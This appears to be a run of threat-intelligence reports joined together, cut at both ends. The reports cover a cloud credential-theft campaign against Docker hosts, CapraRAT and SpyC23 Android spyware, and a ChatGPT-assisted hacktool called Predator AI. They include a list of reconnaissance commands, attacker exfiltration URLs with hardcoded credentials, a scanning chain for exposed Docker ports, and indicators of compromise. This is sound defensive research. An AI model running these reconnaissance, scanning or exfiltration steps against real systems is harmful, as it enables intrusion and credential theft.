The attacker sets variables for a lockfile and datafile in /var/tmp. The result of the following reconnaissance commands is written to the datafile:

whoami	Current user
ls -al	Lists all files in the current directory
who	List of users with active terminal sessions
lastlog	Log of user login history
cat /var/spool/cron/*	Contents of configured cron jobs
ps aux	Details about all running processes
netstat -anop	Network connection and socket details
docker ps	List of Docker containers, including stopped containers

The script then sends the results collected in the datafile to the C2 using curl with a provided username and password.

Credentials Exfiltration

After collecting and processing the credentials, the credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server. The script contains hardcoded credentials that are used to authenticate the request. The June 2023 campaigns use the following username, password, and server URL combinations:

SHA1	5611cb5676556410981eefab70d0e2aced01dbc5
Name	aws.sh
Username	jegjrlgjhdsgjh
Password	oeireopüigreigroei
Exfil URL	http[:]//everlost.anondns.net/upload.php

SHA1	61da5d358df2e99ee174b22c4899dbbf903c76f0
Name	aws.sh (newer)
Username	1234
Password	5678
Exfil URL	http[:]//silentbob.anondns.net/insert/keys.php

SHA1	ac78d5c763e460db2137999b67b921e471a55e11
Name	g.aws.sh
Username	1234
Password	5678
Exfil URL	http[:]//ap-northeast-1.compute.internal.anondns.net/insert/keys.php

SHA1	dba0dcb8378d84abc8f7bf897825dd4f23e20e04
Name	data.sh
Username	8765
Password	4321
Exfil URL	http[:]//everlost.anondns.net/data.php

Propagation

In addition to the usual shell scripts, we observed the actor delivering a UPX-packed, Golang-based ELF binary. The binary ultimately drops and executes another shell script that scans an actor-specified range and attempts to propagate to vulnerable targets. We believe the reason the actor used this binary to deliver yet another script is due to the relatively noisy nature of the scanning activity. The scanner is hidden as an embedded base64 object within the packed Golang binary, adding more stealth than a standalone shell script. Additionally, the binary drops Zgrab–a Golang network scanning tool–which depends on Golang environment variables that are set by running the parent Go binary.

The implemented code enables the binary to read a command from a string and execute it using os_exec.

The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function. In the embedded script, the setupsomething function downloads the following packages on systems using the Yum package manager:

• Compiler and code processing: gcc make git jq
• Network utilities: libpcap libpcap-devel curl

This function also downloads the following packages on systems that use the Apt package manager:

• Compiler and code processing: gcc make git jq
• Network utilities: libpcap0.8 libpcap0.8-dev masscan curl

Next, setupsomething checks if masscan, docker, and zgrab are installed. If not, the script downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].

The dAPIpwn function takes the following arguments:

• IP range: collected from the C2 server at /gr.php
• Ports: 2375, 2376 – respectively used for Docker unencrypted and encrypted communications
• Rate: 500,000 packets per second

The function passes these arguments to masscan, which scans the specified IP ranges then passes the results to zgrab, which looks for http responses from the remote endpoint /v1.16/version. The output is filtered using grep to search for lines containing the strings 'ApiVersion' or 'client version 1.16'. Aqua also detailed a step in the attack chain that looks for misconfigured Docker daemons running version 1.16. Interestingly, a Shodan search revealed only apparent honeypot systems responding with these strings on the specified ports.

When a system is deemed vulnerable, the script calls back to the C2 using curl with the vulnerable IP address and port added to the request URI.

Conclusion

This campaign demonstrates the evolution of a seasoned cloud actor with familiarity across many technologies. The meticulous attention to detail indicates the actor has clearly experienced plenty of trial and error, shown in choices like serving the curl binary to systems that do not already have it. The actor has also improved the tool’s data formatting to enable more autonomous activity, which demonstrates a certain level of maturity and skill.

While AWS has long been in the crosshairs of many cloud-focused actors, the expansion to Azure and GCP credentials indicates there are other major contenders holding valuable data.

We believe this actor is actively tuning and improving their tools. Based on the tweaks observed across the past several weeks, the actor is likely preparing for larger scale campaigns. The lack of threats explicitly targeting Azure and GCP credentials up to this point means there are likely many fresh targets. The current focus on Docker is ultimately arbitrary: this actor has previously targeted other technologies and there are many other oft-forgotten vulnerable applications.

Organizations can prepare against these attacks by ensuring that applications are configured properly and patched as security fixes become available. Docker access should be restricted to suit your organization’s needs while reducing exposure from outside connections.

Indicators of Compromise

SHA1	Description
0e1805fd9efa6a1c3fe9adb3f34373a9dcc7fe19	run.sh
18d28ac44c5501f1768f0fc155ad38aa56610881	chattr ELF binary
27414df2f9a687db65d2bc5fed011a1f0f550417	aws.sh v3
2ed9517159b89af2518cf65a93f3377dea737138	UPX-packed Golang ELF binary that drops scanner script
37cb34a044c70d1acea5a3a91580b7bfc2a8e687	ELF binary, potentially Tsunami
3d6aaed47135090326780727fef57ce1c1573aa2	tmate.sh
5611cb5676556410981eefab70d0e2aced01dbc5	aws.sh v2
6123bbca11385f9a02f888b21a59155242a96aba	user.sh
61da5d358df2e99ee174b22c4899dbbf903c76f0	aws.sh v5
63fe964140907470427e035bdba5230f6a302056	b.sh (Install script)
654be7302f4a3638929fe5e67f6f2739a1801b07	clean.sh
828960576e182ec3206f457a263f25ee0531edbb	curl.full
863bf9617f82c9c595cc9b09e84a346a306060c2	Embedded script from binary with dAPIpwn function capability
8802f1bf8f83e354f14686fe79b5018cd36eb77f	aws.sh v6
ac78d5c763e460db2137999b67b921e471a55e11	aws.sh v4
b13d62f15868900ab22c9429effdfb7939563926	aws.sh v7
c9edc82bc3ac344981231965bedec300fec31b1f	xc3.sh
d79970f66a56f69667284c4c937f666758200ab4	grab.sh
dba0dcb8378d84abc8f7bf897825dd4f23e20e04	data.sh profiling script
eb3dff13ed97670e06649e8daaa6e4ab655477f6	aws.sh v1
f437aeac3721a0038c936bab5a2ac1ccdb0cf222	int.sh

Monero Wallet address, C3Pool XMR

43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U 

Domains

ap-northeast-1.compute.internal.anondns[.]net
everlost.anondns[.]netsilentbob.anondns[.]net
everfound.anondns[.]net

IPv4s

207.154.218.221
45.9.148.108

URLs

http[:]//silentbob.anondns.net/bin/chattr 
http[:]//silentbob.anondns.net/bin/a 
http[:]//silentbob.anondns.net/cmd/grab.sh 
http[:]//silentbob.anondns.net/cmd/clean.sh 
http[:]//silentbob.anondns.net/cmd/aws.sh 
http[:]//silentbob.anondns.net/cmd/xc3.sh 
http[:]//silentbob.anondns.net/bin/sysfix/curl.full 
http[:]//silentbob.anondns.net/bin/chattr 
http[:]//silentbob.anondns.net/insert/gscat.php 
http[:]//silentbob.anondns.net/insert/tmate.php 

Executive Summary

• SentinelLabs identified three Android application packages (APK) linked to Transparent Tribe’s CapraRAT mobile remote access trojan (RAT).
• These apps mimic the appearance of YouTube, though they are less fully featured than the legitimate native Android YouTube application.
• CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects.

Background

Transparent Tribe is a suspected Pakistani actor known for targeting military and diplomatic personnel in both India and Pakistan, with a more recent expansion to the Indian Education sector. Since 2018, reports have detailed the group’s use of what is now called CapraRAT, an Android framework that hides RAT features inside of another application. The toolset has been used for surveillance against spear-phishing targets privy to affairs involving the disputed region of Kashmir, as well as human rights activists working on matters related to Pakistan.

Transparent Tribe distributes Android apps outside of the Google Play Store, relying on self-run websites and social engineering to entice users to install a weaponized application. Earlier in 2023, the group distributed CapraRAT Android apps disguised as a dating service that conducted spyware activity.

One of the newly identified APKs reaches out to a YouTube channel belonging to Piya Sharma, which has several short clips of a woman in various locales. This APK also borrows the individual’s name and likeness. This theme suggests that the actor continues to use romance-based social engineering techniques to convince targets to install the applications, and that Piya Sharma is a related persona.

CapraRAT is a comprehensive RAT that provides the actors with the ability to harvest data on demand and exfiltrate it. Notable features include:

• Recording with the microphone, front & rear cameras
• Collecting SMS and multimedia message contents, call logs
• Sending SMS messages, blocking incoming SMS
• Initiating phone calls
• Taking screen captures
• Overriding system settings such as GPS & Network
• Modifying files on the phone’s filesystem

App Analysis

CapraRAT is distributed as an Android APK. When the tool was initially named by Trend Micro, their research team noted that CapraRAT may be loosely based on the AndroRAT source code.

We performed static analysis on two YouTube-themed CapraRAT APKs: 8beab9e454b5283e892aeca6bca9afb608fa8718 – yt.apk, uploaded to VirusTotal in July 2023. 83412f9d757937f2719ebd7e5f509956ab43c3ce – YouTube_052647.apk, uploaded to VirusTotal in August 2023. We also identified a third APK called Piya Sharma, the YouTube channel persona described earlier: 14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma.apk, uploaded to VirusTotal in April 2023

The yt and YouTube APKs apps are disguised as YouTube, borrowing the YouTube icon.

The app requests several permissions. YouTube is an interesting choice for masquerading the app: some permissions, like microphone access, make sense for recording or search features. Other permissions–like the ability to send and view SMS–are less relevant to the expected app behaviors.

When the app is launched, MainActivity’s load_web method launches a WebView object to load YouTube’s website. Because this loads within the trojanized CapraRAT app’s window, the user experience is different from the native YouTube app for Android and akin to viewing the YouTube page in a mobile web browser.

Key Components

Because CapraRAT is a framework inserted into a variety of Android applications, the files housing malicious activity are often named and arranged differently depending on the app. The CapraRAT APKs we analyzed contain the following files:

Name	yt.apk
Configuration	com/media/gallery/service/settings
Version	MSK-2023
Main	com/media/gallery/service/MainActivity
Malicious Activity	com/media/gallery/service/TPSClient

Name	YouTube_052647.apk
Configuration	com/Base/media/service/setting
Version	A.F.U.3
Main	com/Base/media/service/MainActivity
Malicious Activity	com/Base/media/service/TCHPClient

Name	Piya Sharma.apk
Configuration	com/videos/watchs/share/setting
Version	V.U.H.3
Main	com/videos/watchs/share/MainActivity
Malicious Activity	com/videos/watchs/share/TCPClient

CapraRAT’s configuration file, which is named interchangeably setting or settings, holds the default configuration information, as well as metadata like versioning. The CapraRAT version syntax seen in YouTube_052647.apk and Piya Sharma.apk–A.F.U.3 and V.U.H.3, respectively–matches the convention used to track Transparent Tribe’s Windows tool, CrimsonRAT. However, there is no tangible relationship between these version numbers and the C2 domains as we saw in CrimsonRAT.

Thanks to creative spelling and naming conventions, the RAT’s configuration provides consistent static detection opportunities, with each of the following present in the samples from earlier in 2023 as well:

 	is_phical
 	isCancl
 	isRealNotif
 	SERVERIP
 	smsMoniter
 	smsWhere
 	verion

MainActivity is responsible for driving the application’s key features. This activity sets persistence through the onCreate method which uses Autostarter, an open-source project with code that lets developers automatically launch an Android application. The TPSClient class is initialized as an object called mTCPService; then, this method calls the serviceRefresh method, which creates an alarm at the interval specified in the settings file’s timeForAlarm variable. In this example, the value 0xea60 is equal to 60,000 milliseconds, meaning the alarm and persistence launcher run once per minute.

The RAT’s core functionality is in an activity similar to the Extra_Class activity from the March 2023 samples reported by ESET. Henceforth, we call this activity TPSClient for simplicity. These files are rather large, decompiling to over 10,000 lines of Smali code. By comparison, the March versions’ equivalents have only about 8,000 lines.

TPSClient contains CapraRAT’s commands, which are invoked through the run method via a series of switch statements that map the string command to a related method.

Many of these commands have been documented in previous research, though there are several changes in these new versions. The hideApp method now checks if the system is running Android version 9 or earlier and if the mehiden variable in the setting(s) config file was set to False; if applicable, the app will be hidden from the user’s view. While similarities between CapraRAT and AndroRAT are seemingly minimal at this point in CapraRAT’s development, the AndroRAT source code documentation notes that the tool becomes unstable after Android version 9, so there are likely underlying changes to the OS that make this method behave differently depending on the OS version.

TPSClient has a method check_permissions() that is not in Extra_Class. This method checks the following series of Android permissions and generates a string with a True or False result for each:

• READ_EXTERNAL_STORAGE
• READ_CALL_LOG
• CAMERA
• READ_CONTACTS
• ACCESS_FINE_LOCATION
• RECORD_AUDIO
• READ_PHONE_STATE

Interestingly, some other older versions contain this method, suggesting that the samples may be tailored for targets or are potentially developed from different branches.

C2 & Infrastructure

In CapraRAT’s configuration file, the SERVERIP variable contains the command-and-control (C2) server address, which can be a domain, IP address, or both. The C2 port is in hexadecimal Big Endian format; the human readable port can be obtained by converting into decimal, resulting in port 14862 for yt.apk, port 18892 for YouTube_052647.apk, and port 10284 for Piya Sharma.apk.

The shareboxs[.]net domain used by YouTube_052647.apk has been associated with Transparent Tribe since at least 2019. Interestingly, the ptzbubble[.]shop domain was registered the same week of ESET’s report outlining the group’s Android apps that leveraged other C2 domains.

The IP addresses associated with C2 from the two YouTube samples have Remote Desktop Protocol port 3389 open with the service identified as Windows Remote Desktop, indicating the group uses Windows Server infrastructure to host the CapraRAT C2 application. The Piya Sharma app’s C2 IP, 209[.]127.19.241, has a certificate with common name value WIN-P9NRMH5G6M8, a longstanding indicator associated with Transparent Tribe’s CrimsonRAT C2 servers.

84[.]46.251.145–the IP address hosting ptzbubble[.]shop domain–shows historical resolutions associated with Decoy Dog Pupy RAT DNS tunneling lookups. Any connection between these campaigns is unclear; it is plausible that a service hosted on this IP was infected by that campaign. Based on the query dates, the claudfront[.]net lookup was during the time the CapraRAT actor was using this IP address to host ptzbubble[.]shop, while a lookup to allowlisted[.]net was in December 2022, which was potentially before this actor started using the IP.

Conclusion

Transparent Tribe is a perennial actor with reliable habits. The relatively low operational security bar enables swift identification of their tools.

The group’s decision to make a YouTube-like app is a new addition to a known trend of the group weaponizing Android applications with spyware and distributing them to targets through social media.

Individuals and organizations connected to diplomatic, military, or activist matters in the India and Pakistan regions should evaluate defense against this actor and threat.

Defensive and preventative measures should include:

• Do not install Android applications outside of the Google Play store.
• Be wary of new social media applications advertised within social media communities.
• Evaluate the permissions requested by an application, particularly an application you are not particularly familiar with. Do these permissions expose you to more risk than the potential benefit of the app?
• Do not install a third-party version of an application already on your device.

CapraRAT malware is fully detected by SentinelOne’s Singularity Mobile solution.

Indicators of Compromise (IOC)

Files Hashes – SHA1
14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma APK
83412f9d757937f2719ebd7e5f509956ab43c3ce – CapraRAT, YouTube_052647.apk
8beab9e454b5283e892aeca6bca9afb608fa8718 – CapraRAT, yt.apk

C2 Network Communications
newsbizshow.net
ptzbubble.shop
shareboxs.net

95[.]111.247.73
209[.]127.19.241

Executive Summary

• Arid Viper is an espionage-motivated cyber threat actor with Hamas-aligned interests. Arid Viper’s toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017.
• Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped.
• There are overlaps between recent SpyC23 versions and their 2017 predecessors, tying together several Arid Viper Android malware families.
• Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israeli-Hamas war. In this context, traditional cyberespionage activities are often enablers for on-the-ground operations and deserve additional scrutiny.

Background

The Arid Viper group has a long history of using mobile malware, including at least four Android spyware families and one short-lived iOS implant, Phenakite. The SpyC23 Android malware family has existed since at least 2019, though shared code between the Arid Viper spyware families dates back to 2017. It was first reported in 2020 by ESET in a campaign where the actor used a third-party app store to distribute weaponized Android packages (APK). That campaign featured several apps designed to mimic Telegram and Android application update managers.

Through 2022 and early 2023, Arid Viper developed several newer SpyC23 versions that share these themes: two apps mimick Telegram, while another is internally called APP-UPGRADE but is based on a romance-themed messaging app called Skipped Messenger. Cisco Talos recently reported on the history of Skipped Messenger, revealing that the once-benign dating application was likely passed from the original developer to the Arid Viper actor.

SentinelLabs compared these newer versions of SpyC23 to the earlier 2020 version, as well as several older Android spyware families associated with Arid Viper: GnatSpy, FrozenCell, and VAMP. Many changes have been made in SpyC23’s development; however, there are notable overlaps with these older families and the taxonomy is less distinct.

App Analysis

The theme of these applications center on messaging and communications. We identified two unique themes: one mimics Telegram, the other mimics an apparent dating-themed app called Skipped Messenger. The group has previously relied on Telegram-themed messengers as well as romance-themed lures and apps.

Arid Viper often relies on social engineering to deliver malware with pretexts that allow operators to engage closer to thier intended victims. The social engineering approach is a boon for delivering Android malware, as there are many hurdles for the actor to overcome before a user successfully installs a malicious app. Working the installation flow into a social engineering pretext is likely more effective than expecting users to install spyware successfully without prompting.

There is a non-weaponized version of Skipped Messenger (SHA-1: 6e1867bd841f4dc16bef21b5a958eec7a6497c4e) that shares the same Firebase service hostname skippedtestinapp[.]firebaseio[.]com as the malicious version. As the Talos report noted, Skipped was originally a legitimate dating app. The Google Play store version was last updated in August 2021.

Like most malicious Android apps, these apps ask the user to enable permissions that facilitate spyware activities.

The application permissions give a high degree of control over the device, including:

• Accessing the phone’s location
• Making calls without user interaction
• Monitoring calls made by the user
• Recording with the microphone, capturing audio output
• Read & Write to storage
• Read & Write to the Contacts list
• Modifying network state
• Collecting a list of accounts used on the device
• Downloading files to the phone without user interaction
• Launching Java archive (JAR) files as a Service
• Reading notifications received on the device as well as any connected wearables

The developer employed anti-decompilation and anti-virtualization techniques to complicate analysis. Each of these APKs contains application code that is obfuscated. On emulated Android devices, the apps flash and repeatedly cycle through prompts even after the requested permissions have been granted.

Comparing these new versions with older SpyC23 variants, there is significant overlap in package names, which fortifies the relationship between the old and new versions. In the image below, the older version on the left houses malicious activity in the update.bbm package, and the version we discovered on the right houses similar subpackages in the apps.sklite.pacJava package.

The overlaps continue in the class names. The actor frequently names classes after people’s names, as outlined in the rc_cola/tas_ran_rc_col package structure.

These applications are quite large, making analysis of each class impractical. Instead, we will focus on several interesting classes and methods.

ACCAPPService

This class handles some communications to the C2. Of note, the class contains code that pertains to the user uninstalling the application. The SendToServerTask subclass logs when the user is in a ‘dangerous’ menu and parses input containing the active menu name for the English words ‘apps’ or ‘applications’ as well as the Arabic word for ‘Applications’.

Brodie

This class is responsible for much of the app’s upload request handling, acting as an interface between the app and the C2 server. Brodie contains a method named isProbablyArabic, suggesting again that these apps are used against Arabic-speaking targets.

CallRecService

This service enables the spyware’s call recording feature. The class is imported from an external library, libcallrecfix.so, and runs as a service. The Unix library is based on at least two open-source Android call recording projects, though neither are actively maintained. This was implemented in 2020 and has been a staple of SpyC23 iterations since. The library is a binary compiled for each of the app’s compatible architectures.

checkRaw

This Audio upload service has many of the same status logging strings and media recording parameters seen in older versions of Arid Viper’s Android toolsets, including FrozenCell, reported by Lookout in 2017, and VAMP, which was reported by Palo Alto in 2017 as well.

Some elements of this audio recording code are present in GitHub repositories described as a teardown of the Telegram Android app. While this is potentially an adaptation of open-source software, the similarities between the SpyC23 APKs are consistent, and the external versions do not have the same variables or logging messages.

Moller

This class is notable because it contains code that spans back to much earlier versions of Arid Viper’s Android spyware. We identified a 2017 GnatSpy sample from Trend Micro’s Arid Viper reporting that shares the same upload functionality through a subclass JsDirService.

Panda

This class loads methods from external libraries libRoams.so and lib-uoil.so. The code imports several functions related to manufacturer-specific implementations, including Huawei, Oppo, and Xiaomi.

The Panda class imports methods from the open-source Gotev Android Upload Service, which was also used by the older versions of SpyC23. Panda imports methods from the OKhttp library to craft HTTP requests. When the OnCreate method runs, it initializes the Gotev service, parses the C2 configuration values, and registers GarciaReceiver, a receiver that monitors for a connection state change which was also present in older versions.

Like older versions of SpyC23, this class has logic to parse and decode the C2 server details from strings stored inside the lib-uoil.so and related binaries. The strings are encoded partially in Base64 with an additional layer likely on top to parse the correct C2 server URIs. The previous technique of dropping the strings before and after the hyphen remain, and further substitution removes spaces and underscores, replacing them with hyphens.

C2 Infrastructure

The C2 servers used by these apps continue the longstanding Arid Viper domain naming scheme of a hyphenated hostname that uses Western-sounding peoples’ names. The primary C2 servers are:

• luis-dubuque[.]in – C2 domain used by APP-UPGRADE Skipped Messenger APK
• danny-cartwright[.]firm[.]in – C2 domain used by com.teleram.app APK
• conner-margie[.]com – C2 domain used by com.alied.santafi

We have included additional network indicators associated with app features that are unique to the APKs analyzed, including Google Cloud project hostnames and Firebase messaging hostnames.

Conclusion

The discovery of these APKs demonstrates that Arid Viper continues to thrive in the mobile malware space. The dedication to anti-analysis and obfuscation suggests that the developers have an awareness of research analysis and they have applied measures to deter them and remain under the radar. The presence of code from other Arid Viper Android spyware families in SpyC23 fortifies the connection between this group’s various iterations of tools. The resulting bloat from carrying over older versions of the spyware aids attribution in the complex mobile malware landscape that pervades in the Middle East.

Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents. The most recent versions of SpyC23 highlight the actor’s focus on Arabic speakers, which is an interesting development given the actor’s historical penchant for targeting Israeli military personnel with Android spyware.

Those who are at risk of being targeted by this group should avoid installing applications from outside of the Google Play Store. Everyone should remain wary when installing new apps from any source: does this app really need the permissions it requests? In the case of SpyC23 apps, there is a lengthy walkthrough with images guiding the user to accept an inordinate number of permissions.

SentinelLabs would like to thank the research team at Cisco Talos for their collaboration on this research.

Indicators of Compromise

SHA1	Notes
03448782d5b717b7ad1a13b1841119bc033f40dd	Teleram /lib/mips/librealm-jni.so
12af178d20ec7e1294873304b0ea81b5fcfd6333	Teleram /lib/armeabi-v7a/librealm-jni.so
17ab647f3b7ccf15b82f51e19301e682f7e8c82a	APP-UPGRADE /armeabi-v7a/libRoams.so
29814eacb12b53efcda496485765a30c3c2b589e	Santafi /lib/x86_64/libsonsod.so
2f0895fa9e1a404da46f56ab13c131de1a0eac1e	APP-UPGRADE /x86/libRoams.so
300fb7a0597519b99b6120d16666be9b29ee5508	APP-UPGRADE /x86_64/libcallrecfix.so
31ba9425007d17745bb6b44c85042dcbd15fe837	Santafi /lib/x86_64/libcallrecfix.so
46bfcb28cde424d0d11e5772c2683391b0f1491a	com.teleram.app.apk a Telegram-themed APK
4f58d69c53685365a4b6df70eca6fa203e6ba674	APP-UPGRADE /x86_64/libRoams.so
532876649c027ebaea56604fbcd7ce909a8aa4e3	APP-UPGRADE /arm64-v8a/libcallrecfix.so
5476d52ab6f982bb29ba2ace0074e77523f9f655	APP-UPGRADE /x86/libcallrecfix.so
55c9c7a53c9468d365743f155b2af7e189586822	APP-UPGRADE /arm64-v8a/libRoams.so
5a238ade0b402c3dbef7c82406649f27ae6b479a	Santafi /lib/x86/libcallrecfix.so
600442488eb9536c821188dfad9d59e987ff7a56	Santafi /lib/armeabi-v7a/libsonsod.so
6f68e8645b4b88d7608310b7736749368398914a	Teleram /lib/x86/librealm-jni.so
793177ffe60030fefbe6a17361b266980f151fa4	Santafi /lib/arm64-v8a/libcallrecfix.so
893dae5ded7eb0a35e84867e62cbbb7e831aac97	Santafi /lib/arm64-v8a/libdalia.so
9c1c02a387b0aa59b09962f18e4873699d732019	Santafi /lib/armeabi-v7a/libcallrecfix.so
9d9696bc552dc5dbb4d925d0fb04f77018deef50	Teleram /lib/x86_64/librealm-jni.so
a610a05d6087bc1493e505fd4c1e4ef4b29697e3	com.alied.santafi.apk a Telegram-themed APK
a8937d38cc8edb9b2dfb1e6e1c5cad6f63ae0ecc	APP-UPGRADE /x86/libuoil.so
a8e0b6fda4bc1bd93d2a0bc30e18c65eb7f07dec	Teleram /lib/arm64-v8a/libcallrecfix.so
aacb4e5f9e6b516b52d0008f2e5f58c60b46610b	Teleram /lib/armeabi-v7a/libcallrecfix.so
ae8d4853377f4a553ecad0c84398ef9dc8735072	Teleram /lib/x86/libcallrecfix.so
b9835174a9a4445dc4d5ff572a79c54f234120bf	Santafi /lib/armeabi-v7a/libdalia.so
c0f4592df97073fb5021e2acee0a3763b8fbaf76	Teleram /lib/x86_64/libcallrecfix.so
c1c5a00b22e7d12e8a41d5d8fbe625ecb218fa7c	Santafi /lib/arm64-v8a/libsonsod.so
c396327a2332bd6fbc771a97b5e0d4d1a43e8f72	APP-UPGRADE themed Skip Messenger APK
ce954dcc62f17f6e31bfa9164f5976740f1b127e	APP-UPGRADE /arm64-v8a/libuoil.so
cfa5ef1bff2746407f96ab5c86b66ec5cf305e77	Santafi /lib/x86_64/libdalia.so
da690c4b1569e1f0b0734762c0f274e3ba33ded1	APP-UPGRADE /armeabi-v7a/libuoil.so
de92fb9af9d6e68a001b6263b9c3158325d77f99	Teleram /lib/arm64-v8a/librealm-jni.so
e05ce0496c6d20c24997c17a65c44ccd08cb2a10	APP-UPGRADE /armeabi-v7a/libcallrecfix.so
eb14e05364e675fcf03934be549ae96b36b12af0	Santafi /lib/x86/libdalia.so
f8adf63d34eb54121389b9847771d110978aec8e	APP-UPGRADE /x86_64/libuoil.so
fb7b9681567478a660413ec591fc802e35a55b7e	Santafi /lib/x86/libsonsod.so

Domain	Notes
1058215140016-kv5c01acm9r7argbis96lmudg6p68koe.apps.googleusercontent.com	Google Cloud content hostname used by APP-UPGRADE Skipped Messenger APK
1095841779797-idgdkor5mh0lbjeq5spcksbj7jpdlaj9.apps.googleusercontent.com	Google Cloud web client hostname used by com.alied.santafi
314359296475-glearr20do927s2v75cgiocb585gqjgd.apps.googleusercontent.com	Google Cloud web client hostname used by Teleram app
conner-margie[.]com	C2 domain used by com.alied.santafi
danny-cartwright[.]firm[.]in	C2 domain used by com.teleram.app APK
jolia-16e7b.appspot.com	Google Storage bucket used by com.alied.santafi
luis-dubuque[.]in	C2 domain used by APP-UPGRADE Skipped Messenger APK
rashonal.appspot.com	Google Cloud web client hostname used by APP-UPGRADE Skipped Messenger APK
skippedtestinapp.firebaseio.com	Firebase service for Skipped Messenger APKs
yellwo-473d0.appspot.com	Google Storage bucket used by Teleram app

Executive Summary

• SentinelLabs has identified a new Python-based infostealer and hacktool called ‘Predator AI’ that is designed to target cloud services.
• The Predator AI developer implemented a ChatGPT-driven class into the Python script, which is designed to make the tool easier to use and to serve as a single text-driven interface between disparate features.
• These advancements are not production ready, but demonstrate that actors can realistically use AI to improve their workflows by automating data enrichment and adding context to scanner results.

Background & Distribution

Predator AI is advertised through Telegram channels related to hacking. The main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES. However, Predator is a multi-purpose tool, much like the AlienFox and Legion cloud spamming toolsets. These toolsets share considerable overlap in publicly available code that each repurposes for their brand’s own use, including the use of Androxgh0st and Greenbot modules.

Predator is an actively developed project. In September 2023, a member of the primary Telegram channel inquired about Predator adding a Twilio account checker, to which the developer replied they could deliver in about 2 weeks. In October, the developer posted an update showing the new Twilio checking feature. The version we analyzed has Twilio features, which suggests it is a recent build.

At the top of the script, there is a message from the developer which states that the tool is protected by copyright law. The message also has a disclaimer saying the tool is for educational purposes and the author does not condone any illegal use.

Targeting & Technical Details

Predator is a Python application with over 11,000 lines. The application runs entirely through a Tkinter-based graphical user interface (GUI): there is no standalone command line interface (CLI) mode, which distinguishes Predator from many similar tools. The Tkinter approach requires several JSON configuration files.

The script has 13 global classes defined, which roughly segment the different features.

Class Name	Details
Predator	The largest class. Goes from the beginning to line 7079.
Settings	Only two lines. Sets UpdatesCheck variable to False and Password to “Predator123”.
Utility	Contains calls to Windows commands that get the current window name and to check if the current user is running as an administrator.
PumperSettings	Code that inflates the size of a file.
FakeErrorBuilder	Creates fake error messages that pertain to XSS testing on a Windows system.
StealerBuilder	Builds a configurable infostealer as a Windows Portable Executable (PE).
Translator	Translates the dialog boxes and menu items that are rendered in the GUI version of the application via Python library Tkinter. Supported languages are Arabic, English, Japanese, Russian, and Spanish.
NetGun	Handles web application security scans with options for proxies and custom wordlists.
CTkMessagebox & CTkListbox	Code that renders the graphical user interface (GUI) via Tkinter.
ThemeMaker	Custom color schemes for the GUI.
GPTj	A ChatGPT-enabled class. Queries the OpenAI API.
NetXplorer	Uses Psutil and Subprocesss to query network status and system information.

Predator has features that can be used to attack many popular web services and technologies, including:

Service Provider	Details	Based In
Aimon	SMS marketing	Italy
Amazon Web Services (AWS) Simple Email Service (SES)	Email platform	United States
Aruba	Hosting	Italy
Clickatell	SMS marketing	South Africa, United States
ClickSend	SMS marketing	Australia
Twilio	SMS, Voice, Video communications	United States
Nexmo	Voice & SMS, acquired by Vonage	United States
OneSignal	SMS, Push Notifications	United States, United Kingdom
Openpay	Buy Now, Pay Later; ceased operations in February 2023	Australia
PayPal	Live environment & Sandbox API keys targeted	United States
Plivo	Voice & Messaging	United States
Razorpay	Payment Processor	India
Skebby	SMS Marketing	Italy
Stripe	Payment Processor	United States
Telnyx	Voice, Messaging, Fax	United States
Textlocal	SMS Marketing	United Kingdom
Valueleaf	Marketing	India
XGATE	Marketing & CRM	Hong Kong

Predator’s web application attacks look for common weaknesses, misconfigurations or vulnerabilities in Cross Origin Resource Sharing (CORS), exposed Git configuration, PHPUnit Remote Code Execution (RCE), Structured Query Language (SQL), and Cross-Site Scripting (XSS).

The following technologies are targeted:

• Drupal
• Joomla
• Laravel
• Magento
• OpenCart
• osCommerce
• PrestaShop
• vBulletin
• WordPress

Predator AI | The GPTj Class

The GPTj class contains the ‘Predator AI’ feature, which is a chat-like text processing interface that connects the user to Predator’s features. The actor designed Predator AI to try to find a local solution first before querying the OpenAI API, which reduces the API consumption.

This class searches the user’s input for strings associated with a known use case centered around one of Predator’s web application and cloud service hacking tools. There are more than 100 cases where Predator handles the data internally or through a free third-party service, such as an IP reputation lookup service. This class contains several partially implemented utilities related to AWS SES and Twilio, as well as utilities to get information about IP addresses and phone numbers.

Predator queries the ChatGPT API only when there is no test case to handle the input. There are several driving functions defined inside this class that handle the activity flow or enable ChatGPT interaction:

generate_text

This function requires two arguments: prompt and api_key. The function uses the OpenAI model text-davinci-003 with a maximum token length of 400 and temperature 0.7. The code makes a POST request to https://api.openai.com/v1/completions and returns the result for handling via the Tkinter UI.

Ai_Backend

This function takes one argument, usrMsg. This code contains the hardcoded OpenAI API key and calls the generate_text function on the usrMsg object with the API Key. The OpenAI server response is returned.

aiRes

This function takes two arguments, msg and patch. This function only calls Ai_Backend–and OpenAI as a result–when the patch argument is equal to 0, or not given. Predator has 106 references to aiRes and each reference has a patch value that should not equal 0. This means the OpenAI functionality is designed to handle edge cases that the script has not natively handled. The function processes whether a patch is present and modifies the UI result based on the length of the response from OpenAI or the patched result.

ChatEvent

This function contains the modular utilities offered by the class. It takes no arguments.

When the user command is not routed to ChatGPT, several functions handle the request locally or through alternate API calls. We break them down by category.

AWS Features

Though the core utility is present, not all of the following functions are called inside the script, suggesting the developer is still working on these features. This code has significant overlap with AlienFox, Legion, and other earlier iterations of these tools. Based on what is currently in the script, there is no indication that AWS-related data would be sent to the ChatGPT service. Instead, the script parses the input for the presence of aws.c and calls the following functions when present.

If these features were fully implemented, the attacker could use them to perform the following when they have valid AWS account credentials:

• Check for all email accounts in an AWS SES environment.
• Check send quotas.
• Create a new account, assign administrative privileges, and delete the old account.

TwilioChecker

